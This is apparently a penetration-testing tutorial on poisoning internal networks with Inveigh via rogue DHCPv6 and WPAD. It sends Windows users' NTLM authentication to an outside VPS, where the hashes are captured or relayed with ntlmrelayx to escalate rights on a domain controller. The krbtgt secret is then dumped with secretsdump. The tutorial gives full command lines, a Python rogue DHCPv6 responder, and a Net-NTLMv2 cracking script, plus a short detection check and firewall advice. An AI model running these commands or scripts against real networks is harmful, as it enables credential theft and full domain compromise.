Exploiting the Inveigh + IPv6 DNS + NTLM Relay attack chain
Inveigh poisons the internal network by acting as a rogue DHCPv6 server, so that it becomes the victims' IPv6 DNS server; it then answers their WPAD lookups with an attacker-controlled address, and the NTLM authentication the browser performs against that address is captured, or relayed onward with ntlmrelayx.
Features
The tool implements attacks over the following protocols:
-LLMNR [packet sniffer | listener]
-DNS [packet sniffer | listener]
-mDNS [packet sniffer | listener]
-NBNS [packet sniffer | listener]
-DHCPv6 [packet sniffer | listener]
-ICMPv6 [privileged raw socket]
-HTTP [listener]
-HTTPS [listener]
-SMB [packet sniffer | listener]
-LDAP [listener]
-WebDAV [listener]
-Proxy Auth [listener]
Parameters
Inveigh.exe -?
Control:
-Inspect Default=Disabled: (Y/N) inspect traffic only.
-IPv4 Default=Enabled: (Y/N) IPv4 spoofing/capture.
-IPv6 Default=Enabled: (Y/N) IPv6 spoofing/capture.
-RunCount Default=Unlimited: Number of NetNTLM captures to perform before auto-exiting.
-RunTime Default=Unlimited: Run time duration in minutes.
Output:
-Console Default=3: Set the level for console output. (0=none, 1=only captures/spoofs, 2=no informational, 3=all)
-ConsoleLimit Default=Unlimited: Limit to queued console entries.
-ConsoleStatus Default=Disabled: Interval in minutes for auto-displaying capture details.
-ConsoleUnique Default=Enabled: (Y/N) displaying only unique (user and system combination) hashes at time of capture.
-FileDirectory Default=Working Directory: Valid path to an output directory for enabled file output.
-FileOutput Default=Disabled: (Y/N) real time file output.
-FilePrefix Default=Inveigh: Prefix for all output files.
-FileUnique Default=Enabled: (Y/N) outputting only unique (user and system combination) hashes.
-LogOutput Default=Disabled: (Y/N) outputting log entries.
Spoofers:
-DHCPV6 Default=Disabled: (Y/N) DHCPv6 spoofing.
-DHCPv6TTL Default=300: Lease lifetime in seconds.
-DNS Default=Enabled: (Y/N) DNS spoofing.
-DNSHost Fully qualified hostname to use SOA/SRV responses.
-DNSSRV Default=LDAP: Comma separated list of SRV request services to answer.
-DNSSuffix DNS search suffix to include in DHCPv6/ICMPv6 responses.
-DNSTTL Default=30: DNS TTL in seconds.
-DNSTYPES Default=A: (A, SOA, SRV) Comma separated list of DNS types to spoof.
-ICMPv6 Default=Enabled: (Y/N) sending ICMPv6 router advertisements.
-ICMPv6Interval Default=200: ICMPv6 RA interval in seconds.
-IgnoreDomains Default=None: Comma separated list of domains to ignore when spoofing.
-IgnoreHosts Default=None: Comma separated list of hostnames to ignore when spoofing.
-IgnoreIPs Default=Local: Comma separated list of source IP addresses to ignore when spoofing.
-IgnoreMACs Default=Local: Comma separated list of MAC addresses to ignore when DHCPv6 spoofing.
-Local Default=Disabled: (Y/N) performing spoofing attacks against the host system.
-LLMNR Default=Enabled: (Y/N) LLMNR spoofing.
-LLMNRTTL Default=30: LLMNR TTL in seconds.
-MAC Local MAC address for DHCPv6.
-MDNS Default=Enabled: (Y/N) mDNS spoofing.
-MDNSQuestions Default=QU,QM: Comma separated list of question types to spoof. (QU,QM)
-MDNSTTL Default=120: mDNS TTL in seconds.
-MDNSTypes Default=A: Comma separated list of mDNS record types to spoof. (A,AAAA,ANY)
-MDNSUnicast Default=Enabled: (Y/N) sending a unicast only response to a QM request.
-NBNS Default=Disabled: (Y/N) NBNS spoofing.
-NBNSTTL Default=165: NBNS TTL in seconds.
-NBNSTypes Default=00,20: Comma separated list of NBNS types to spoof. (00,03,20,1B)
-ReplyToDomains Default=All: Comma separated list of domains to respond to when spoofing.
-ReplyToHosts Default=All: Comma separated list of hostnames to respond to when spoofing.
-ReplyToIPs Default=All: Comma separated list of source IP addresses to respond to when spoofing.
-ReplyToMACs Default=All: Comma separated list of MAC addresses to respond to when DHCPv6 spoofing.
-SpooferIP Default=Autoassign: IP address included in spoofing responses.
-SpooferIPv6 Default=Autoassign: IPv6 address included in spoofing responses.
-Repeat Default=Enabled: (Y/N) repeated spoofing attacks against a system after NetNTLM capture.
Capture:
-Cert Base64 certificate for TLS.
-CertPassword Base64 certificate password for TLS.
-Challenge Default=Random per request: 16 character hex NetNTLM challenge for use with the TCP listeners.
-HTTP Default=Enabled: (Y/N) HTTP listener.
-HTTPAuth Default=NTLM: (Anonymous/Basic/NTLM) HTTP/HTTPS listener authentication.
-HTTPPorts Default=80: Comma separated list of TCP ports for the HTTP listener.
-HTTPRealm Default=ADFS: Basic authentication realm.
-HTTPResponse Content to serve as the default HTTP/HTTPS/Proxy response.
-HTTPS Default=Enabled: (Y/N) HTTPS listener.
-HTTPSPorts Default=443: Comma separated list of TCP ports for the HTTPS listener.
-IgnoreAgents Default=Firefox: Comma separated list of HTTP user agents to ignore with wpad and proxy auth.
-LDAP Default=Enabled: (Y/N) LDAP listener.
-LDAPPorts Default=389: Comma separated list of TCP ports for the LDAP listener.
-ListenerIP Default=Any: IP address for all listeners.
-ListenerIPv6 Default=Any: IPv6 address for all listeners.
-Machines Default=Disabled: (Y/N) machine account NetNTLM captures.
-Proxy Default=Disabled: (Y/N) proxy listener authentication captures.
-ProxyAuth Default=NTLM: (Basic/NTLM) Proxy authentication.
-ProxyPort Default=8492: Port for the proxy listener.
-SMB Default=Enabled: (Y/N) SMB sniffer/listener.
-SMBPorts Default=445: Port for the SMB listener.
-SnifferIP Default=Autoassign: IP address included in spoofing responses.
-SnifferIPv6 Default=Autoassign: IPv6 address included in spoofing responses.
-WebDAV Default=Enabled: (Y/N) serving WebDAV over HTTP/HTTPS listener.
-WebDAVAuth Default=NTLM: (Anonymous/Basic/NTLM) WebDAV authentication.
-WPADAuth Default=Enabled: (Y/N) authentication type for wpad.dat requests. (Anonymous/Basic/NTLM)
-WPADResponse Default=Autogenerated: Contents of wpad.dat responses.
Usage
Listen on the public VPS
responder -I eth0 -wrfvP
Run Inveigh.exe inside the internal network to poison it (DHCPv6 spoofing is off by default, so -DHCPv6 Y is required), pointing the spoofed answers at the public IP xx.xx.xx.xx:
Inveigh.exe -DHCPv6 Y -SpooferIP xx.xx.xx.xx
When the target reboots or its network is reconfigured (for example the cable is unplugged and plugged back in), it sends a DHCPv6 Solicit to obtain IPv6 configuration; the rogue answer sets the target's IPv6 DNS server to the poisoning host's IPv6 address. Windows queries an IPv6 DNS server in preference to the IPv4 one, so the attacker now controls name resolution. Inveigh also sends ICMPv6 router advertisements by default (-ICMPv6), which can prompt clients to start the DHCPv6 exchange without waiting for a reboot.
When the target opens a browser, it looks up WPAD to locate a proxy auto-config script; the poisoning host resolves that name to the public VPS, so the browser fetches wpad.dat from the VPS and answers the NTLM challenge Responder returns.
The public VPS then receives the target's Net-NTLM hash.
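The DHCPv6 step above, as an added example (not Inveigh's code): a rogue server answering a client's Solicit or Request with an Advertise or Reply whose OPTION_DNS_SERVERS points at itself, plus the detection check a defender would run over captured DHCPv6 server messages. The DUIDs, the attacker's link-local address fe80::dead:beef, the legitimate resolver fd00:10::53 and the suffix corp.local are constructed placeholders.

```python
"""Rogue DHCPv6 exchange and a detector for it (added example, not Inveigh's code).

Wire format per RFC 8415: msg-type (1 byte), transaction-id (3 bytes), then
options encoded as code(2) | length(2) | data.  All addresses and DUIDs are
constructed placeholders.
"""
import ipaddress
import struct

MSG_SOLICIT, MSG_ADVERTISE, MSG_REQUEST, MSG_REPLY = 1, 2, 3, 7
OPT_CLIENTID, OPT_SERVERID, OPT_DNS_SERVERS, OPT_DOMAIN_LIST = 1, 2, 23, 24

VICTIM_DUID = bytes.fromhex("0001000112345678001122334455")  # DUID-LLT, constructed
ROGUE_DUID = bytes.fromhex("00030001aabbccddeeff")            # DUID-LL, constructed
ROGUE_LINK_LOCAL = "fe80::dead:beef"   # the Inveigh host's IPv6 address (assumed)
REAL_DNS = "fd00:10::53"               # the resolver the organisation really deploys (assumed)


def option(code, data):
    return struct.pack("!HH", code, len(data)) + data


def encode_domain_list(names):
    """DNS wire-format search list: corp.local -> \\x04corp\\x05local\\x00."""
    out = b""
    for name in names:
        for label in name.strip(".").split("."):
            out += bytes([len(label)]) + label.encode("ascii")
        out += b"\x00"
    return out


def decode_domain_list(data):
    names, i = [], 0
    while i < len(data):
        labels = []
        while data[i]:
            n = data[i]
            labels.append(data[i + 1:i + 1 + n].decode("ascii"))
            i += 1 + n
        i += 1
        names.append(".".join(labels))
    return names


def parse_dhcpv6(packet):
    if len(packet) < 4:
        raise ValueError("short DHCPv6 message")
    msg_type = packet[0]
    xid = int.from_bytes(packet[1:4], "big")
    opts, i = {}, 4
    while i + 4 <= len(packet):
        code, length = struct.unpack("!HH", packet[i:i + 4])
        data = packet[i + 4:i + 4 + length]
        if len(data) != length:
            raise ValueError("truncated option %d" % code)
        opts.setdefault(code, []).append(data)
        i += 4 + length
    return msg_type, xid, opts


def build_solicit(xid, client_duid):
    """What the victim sends to ff02::1:2 on boot or link change."""
    return struct.pack("!B", MSG_SOLICIT) + xid.to_bytes(3, "big") + option(OPT_CLIENTID, client_duid)


def rogue_answer(request, server_duid, dns_server, suffix):
    """The rogue server's reply: the option that matters is OPT_DNS_SERVERS naming the attacker."""
    msg_type, xid, opts = parse_dhcpv6(request)
    reply_type = {MSG_SOLICIT: MSG_ADVERTISE, MSG_REQUEST: MSG_REPLY}.get(msg_type)
    if reply_type is None:
        return None
    body = option(OPT_CLIENTID, opts.get(OPT_CLIENTID, [b""])[0])
    body += option(OPT_SERVERID, server_duid)
    body += option(OPT_DNS_SERVERS, ipaddress.IPv6Address(dns_server).packed)
    body += option(OPT_DOMAIN_LIST, encode_domain_list([suffix]))
    return struct.pack("!B", reply_type) + xid.to_bytes(3, "big") + body


def advertised_dns(opts):
    addrs = []
    for data in opts.get(OPT_DNS_SERVERS, []):
        addrs.extend(ipaddress.IPv6Address(data[k:k + 16]) for k in range(0, len(data), 16))
    return addrs


def flag_rogue_dns(packet, allowed_dns):
    """Detection rule: an Advertise/Reply whose DNS list contains a server we did not deploy."""
    msg_type, _, opts = parse_dhcpv6(packet)
    if msg_type not in (MSG_ADVERTISE, MSG_REPLY):
        return []
    allowed = {ipaddress.IPv6Address(a) for a in allowed_dns}
    return [str(a) for a in advertised_dns(opts) if a not in allowed]


if __name__ == "__main__":
    solicit = build_solicit(0xABCDEF, VICTIM_DUID)
    advertise = rogue_answer(solicit, ROGUE_DUID, ROGUE_LINK_LOCAL, "corp.local")
    print("rogue DNS servers advertised:", flag_rogue_dns(advertise, [REAL_DNS]))
```

Run against a capture of UDP 546/547 traffic, the same check flags any Advertise or Reply that names a resolver outside the organisation's list, or any DHCPv6 server traffic at all on a segment where DHCPv6 is not deployed. The matching preventive control on clients is a host firewall rule dropping inbound DHCPv6 (UDP 546), or disabling IPv6 where it is genuinely unused.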
Combined with ntlmrelayx
Instead of only capturing, relay the authentication to the domain controller. Run the following on the public VPS to listen (proxychains carries the LDAP connection to the internal DC 10.211.55.4 over a tunnel the operator already holds into the network; --escalate-user uses the relayed victim's privileges to escalate the existing account hack, for example by granting it DCSync rights, which only succeeds when the victim is sufficiently privileged, such as a Domain Admin, and the DC does not require LDAP signing; --remove-mic is the CVE-2019-1040 MIC-stripping needed when the relayed authentication originates from SMB rather than HTTP, and is harmless here):
proxychains -q python3 ntlmrelayx.py --remove-mic --escalate-user hack -t ldap://10.211.55.4 -smb2support --no-dump
Run Inveigh.exe inside the internal network to poison it, pointing the spoofed answers at the public IP:
Inveigh.exe -DHCPv6 Y -SpooferIP xx.xx.xx.xx
As before, once the target reboots or reconfigures its network, its DHCPv6 request is answered with the poisoning host as IPv6 DNS server, and the browser's WPAD lookup is resolved to the public VPS.
This time the VPS does not just record the Net-NTLM hash: ntlmrelayx relays the authentication through the tunnel to the internal domain controller and performs the privileged LDAP operation on the victim's behalf. With the escalated account, dump the krbtgt secret from the DC:
proxychains -q python3 secretsdump.py xie/hack:P@[email protected] -just-dc-user krbtgt
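What the VPS captures in both walkthroughs is a Net-NTLMv2 response, not a reusable hash: it is keyed to the per-connection server challenge, so it cannot be passed the way an NT hash can, which is why the chain either relays it live with ntlmrelayx or cracks it offline. The following added example (not Responder's, Inveigh's or impacket's code) builds such a capture line from a known password and then recovers the password by trying candidates; the user alice, domain CORP, the challenges, the timestamp and the wordlist are constructed placeholders. MD4 is implemented inline because hashlib often lacks it under OpenSSL 3.

```python
"""Net-NTLMv2 capture format: build one from a known password, then crack it offline.

Added example, not Inveigh's, Responder's or impacket's code.  Every credential,
challenge and timestamp below is a constructed placeholder.
"""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _md4_block(state, block):
    X = struct.unpack("<16I", block)
    a, b, c, d = state
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    rounds = (  # RFC 1320: (function, constant, X index order, shift amounts)
        (lambda x, y, z: (x & y) | (~x & z), 0, range(16), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [(i % 4) * 4 + i // 4 for i in range(16)], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for fn, const, order, shifts in rounds:
        for i, k in enumerate(order):
            a = rotl((a + fn(b, c, d) + X[k] + const) & MASK, shifts[i % 4])
            a, b, c, d = d, a, b, c  # rotating registers reproduces the ABCD/DABC/CDAB/BCDA step pattern
    return [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]


def md4(data):
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        state = _md4_block(state, bytes(msg[off:off + 64]))
    return struct.pack("<4I", *state)


def nt_hash(password):
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(user, domain, password, server_challenge, blob):
    """NTProofStr per MS-NLMP: HMAC-MD5 keyed with the NTLMv2 hash over challenge||blob."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def build_blob(timestamp, client_challenge, av_pairs):
    """NTLMv2_CLIENT_CHALLENGE: resp types, reserved, FILETIME, client nonce, reserved, AV pairs, terminator."""
    pairs = b"".join(struct.pack("<HH", av_id, len(v)) + v for av_id, v in av_pairs) + struct.pack("<HH", 0, 0)
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp) + client_challenge
            + b"\x00" * 4 + pairs + b"\x00" * 4)


def capture_line(user, domain, server_challenge, proof, blob):
    """The line Inveigh/Responder print for a capture (hashcat mode 5600)."""
    return "%s::%s:%s:%s:%s" % (user, domain, server_challenge.hex(), proof.hex(), blob.hex())


def parse_capture_line(line):
    user, _, domain, chal, proof, blob = line.split(":")
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(chal),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def crack(line, candidates):
    """Offline check of candidate passwords against a captured response; None if nothing matches."""
    h = parse_capture_line(line)
    for pw in candidates:
        if hmac.compare_digest(ntlmv2_proof(h["user"], h["domain"], pw, h["challenge"], h["blob"]), h["proof"]):
            return pw
    return None


# Constructed sample capture: a victim "alice" in domain CORP with password Winter2021!.
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
CLIENT_CHALLENGE = bytes.fromhex("aabbccddeeff0011")
SAMPLE_BLOB = build_blob(0x01D7B5C000000000, CLIENT_CHALLENGE,
                         [(2, "CORP".encode("utf-16-le")), (1, "DC01".encode("utf-16-le"))])
SAMPLE_LINE = capture_line("alice", "CORP", SERVER_CHALLENGE,
                           ntlmv2_proof("alice", "CORP", "Winter2021!", SERVER_CHALLENGE, SAMPLE_BLOB),
                           SAMPLE_BLOB)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("recovered:", crack(SAMPLE_LINE, ["Summer2021!", "Winter2021!", "Password1"]))
```

The capture_line output is exactly what is fed to hashcat mode 5600; crack() is the same computation at toy scale. Because the server challenge changes on every connection, a captured line is only useful for offline guessing, while a relay has to happen while the victim's connection is still open.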